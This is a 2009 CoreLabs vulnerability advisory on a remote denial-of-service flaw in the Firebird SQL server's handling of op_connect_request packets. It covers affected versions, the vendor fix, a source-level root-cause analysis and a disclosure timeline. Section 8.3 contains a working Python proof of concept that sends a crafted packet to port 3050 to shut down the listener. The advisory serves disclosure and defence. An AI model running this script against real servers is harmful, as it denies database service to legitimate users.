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Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Firebird SQL op_connect_request main listener shutdown vulnerability
1. *Advisory Information*
Title: Firebird SQL op_connect_request main listener shutdown vulnerability
Advisory ID: CORE-2009-0707
Advisory URL: http://www.coresecurity.com/content/firebird-sql-dos
Date published: 2009-07-28
Date of last update: 2009-07-28
Vendors contacted: Firebird SQL
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Denial of service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 35842
CVE Name: CVE-2009-2620
3. *Vulnerability Description*
Firebird SQL [1] is an open source relational database management system
offering many ANSI SQL standard features that runs on Linux, Windows,
and a variety of Unix platforms.
A remote denial of service vulnerability has been found in Firebird SQL,
which can be exploited by a remote attacker to force the server to close
the socket where it is listening for incoming connections and to enter
an infinite loop, by sending an unexpected 'op_connect_request' message
with invalid data to the server.
4. *Vulnerable packages*
. Firebird SQL v1.5.5
. Firebird SQL v2.0.1
. Firebird SQL v2.0.5
. Firebird SQL v2.1.1
. Firebird SQL v2.1.2
. Firebird SQL v2.1.3 RC1
. Firebird SQL v2.5.0 Beta 1
5. *Non-vulnerable packages*
. Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009)
. Firebird SQL v2.5 Beta 2 (estimated release: July 2009)
. Firebird SQL v1.5.6 (estimated release: August 2009)
. Firebird SQL v2.0.6 (estimated release: October 2009)
Please build a fresh CVS checkout to have a fixed version sooner.
6. *Vendor Information, Solutions and Workarounds*
The issue is resolved in all branches of the Firebird SQL repository. It
is registered in the Firebird SQL bug tracker as:
http://tracker.firebirdsql.org/browse/CORE-2563
7. *Credits*
This vulnerability was discovered and researched by Francisco Falcon
from Core Security Technologies.
8. *Technical Description / Proof of Concept Code*
8.1. *Introduction*
Firebird SQL is an open source relational database management system
offering many ANSI SQL standard features that runs on Linux, Windows and
a variety of Unix platforms.
A remote denial of service can be triggered by an unauthenticated
attacker, by sending an unexpected 'op_connect_request' message with
invalid data of length greater than or equal to 12 bytes to the server.
Inside the server ('src/remote/server.cpp'), the function
'process_packet2()' processes a packet received from a client. This
function has a 'switch' statement that considers all the possible
opcodes defined in the protocol (see 'P_OP' enum 'in
src/remote/protocol.h').
/-----------
src/remote/server.cpp:
...
3404 P_OP op = receive->p_operation;
3405 switch (op)
3406 {
3407 case op_connect:
...
3426 case op_compile:
...
3430 case op_attach:
...
- -----------/
In the case of an 'op_connect_request' packet, the execution flow goes
to the following 'case' in the 'switch' statement:
/-----------
src/remote/server.cpp:
...
3584 case op_connect_request:
3585 aux_request(port, &receive->p_req, sendL);
3586 break;
- -----------/
After calling 'aux_request()' function and executing the 'break'
statement, execution lands here:
/-----------
src/remote/server.cpp:
...
3652 if (port && port->port_state == state_broken) {
3653 if (!port->port_parent) {
3654 gds__log("SERVER/process_packet: broken port, server exiting");
3655 port->disconnect(sendL, receive);
3656 ThreadData::restoreSpecific();
3657 return false;
3658 }
3659 port->disconnect(sendL, receive);
3660 port = NULL;
3661 }
- -----------/
By debugging the 'fbserver.exe' binary when it receives an
'op_connect_request' packet, we can see that the conditions of the first
'if' statement are satisfied, but the condition of the second 'if' is
not, so execution flow goes to the 'port->disconnect()' call:
/-----------
005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3
;port->port_state == state_broken ?
005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D
005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0
;port->port_parent == 0?
005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42
;this conditional jump is taken
005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4
; ASCII "SERVER/process_packet: broken port, server exiting"
005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86
005ACE42 |> 53 PUSH EBX
; /Arg2
005ACE43 |. 57 PUSH EDI
; |Arg1
005ACE44 |. 8BCE MOV ECX,ESI
; |
005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect>
; \port->disconnect(sendL, receive)
- -----------/
The type of 'port' is 'struct rem_port', as defined in
'src/remote/remote.h'. This struct type has a 'disconnect()' function
that is implemented in 'src/remote/server.cpp':
/-----------
src/remote/server.cpp:
1464 void rem_port::disconnect(PACKET* sendL, PACKET* receiveL)
- -----------/
Inside this function, the following code is executed, in order to free
both the sent and received packets and to close the corresponding sockets:
/-----------
src/remote/server.cpp:
...
1492 REMOTE_free_packet(this, sendL);
1493 REMOTE_free_packet(this, receiveL);
1494 this->disconnect();
- -----------/
That call to 'this->disconnect()' will ultimately lead to the
'disconnect()' function in 'src/remote/inet.cpp'. This function is
intended to break a remote connection, and receives a 'rem_port'
structure as parameter.
/-----------
src/remote/inet.cpp:
1731 static void disconnect( rem_port* port)
1732 {
- -----------/
In the first place, the function closes the connection established by
the client, by calling the 'shutdown' function:
/-----------
src/remote/inet.cpp:
...
1763 if (port->port_handle && (SOCKET) port->port_handle !=
INVALID_SOCKET) {
1764 shutdown((int) port->port_handle, 2);
1765 }
- -----------/
After that, as a comment line states, if the current 'rem_port'
structure being disconnected is a child of another 'rem_port' structure,
it recursively calls 'disconnect()' to disconnect the 'rem_port' stored
at 'port->port_async'. 'port_async' is a member of 'rem_port' struct
that describes an asynchronous sibling port.
/-----------
src/remote/inet.cpp:
/* If this is a sub-port, unlink it from it's parent */
...
1789 rem_port* parent = port->port_parent;
1790 if (parent != NULL) {
1791 if (port->port_async) {
1792 disconnect(port->port_async);
1793 port->port_async = NULL;
1794 }
- -----------/
But when that recursive call to 'disconnect()' is made, the
'port->port_async' passed as parameter to be disconnected corresponds to
the main server socket, that is, the socket listening for incoming
connections on port 3050/TCP. Once in the recursive call, 'shutdown()'
and 'closesocket()' functions are invoked, making the server to stop
listening on the default port 3050/TCP, thus denying the service to
legitimate users.
8.2. *Remarks*
As a side effect, the 'fbserver.exe' process will enter an infinite
loop, consuming 100% CPU time.
On Windows platform, in a default installation, Firebird SQL server is
installed as a Windows service, and another service (the Firebird
Guardian) runs together with the server, in order to automatically
restart the 'fbserver.exe' process if it crashes or stops running
abnormally. However, in this case the Firebird Guardian is unable to
detect the denial of service condition, because the server does not
crash nor stops running.
In Firebird SQL 1.5.5 the behavior is different; the server will crash
inside the 'aux_request()' function in 'src/remote/server.cpp' due to a
null pointer dereference, instead of silently shutting down its listener
port. The problem arises when 'port->port_context' (which has a 'NULL'
value at this point) is loaded into 'rdb' variable and then, at line
'885', it is used as a pointer without properly checking that it points
to a valid memory address:
/-----------
src/remote/server.cpp:
...
884 rdb = port->port_context;
885 port->send_response(send, rdb->rdb_id,
886 send->p_resp.p_resp_data.cstr_length, status_vector);
- -----------/
8.3. *Proof of concept*
The following Python script will trigger the denial of service condition
on Firebird SQL, by sending an 'op_connect_request' packet with invalid
data of length greater than or equal to 12 bytes.
/-----------
import socket
import time
def attack(host, port):
op_connect_request = '\x35' # Request to establish connection
packet = '\x00\x00\x00' + op_connect_request
packet += "A" * 12 #Invalid data, must be >= 12 bytes
in order to trigger the DoS
print "(+) Connecting to the server...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "(+) Sending op_connect_request packet..."
s.send(str(packet))
s.close()
print "(+) op_connect_request packet successfully sent."
#Wait 10 seconds and try to connect again to Firebird SQL server, to
check if it's down
print "(+) Waiting 10 seconds before trying to reconnect to the
server..."
time.sleep(10)
try:
print "(+) Trying to reconnect..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.close()
print "(!) Something went wrong. The server is still alive."
except socket.error:
print "(*) Attack successful. The server is down."
port = 3050
host = '192.168.131.128' #Replace with your target host
attack(host, port)
- -----------/
9. *Report Timeline*
. 2009-07-15:
Core Security Technologies notifies the Firebird team of the vulnerability.
. 2009-07-16:
Firebird team requests technical details in plaintext.
. 2009-07-16:
Core sends the advisory draft, including technical details.
. 2009-07-20:
Firebird team notifies that the issue is resolved in all branches of the
Firebird repository [2]. Technical details will be publicly visible when
Core releases its advisory. Firebird team notices that Firebird version
1.5.5 (marked as non vulnerable in the advisory draft) seems to be
affected.
. 2009-07-27:
Core sends the final version of the advisory to the Firebird team.
. 2009-07-28:
The advisory CORE-2009-0707 is published.
10. *References*
[1] http://www.firebirdsql.org
[2] http://tracker.firebirdsql.org/browse/CORE-2563
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
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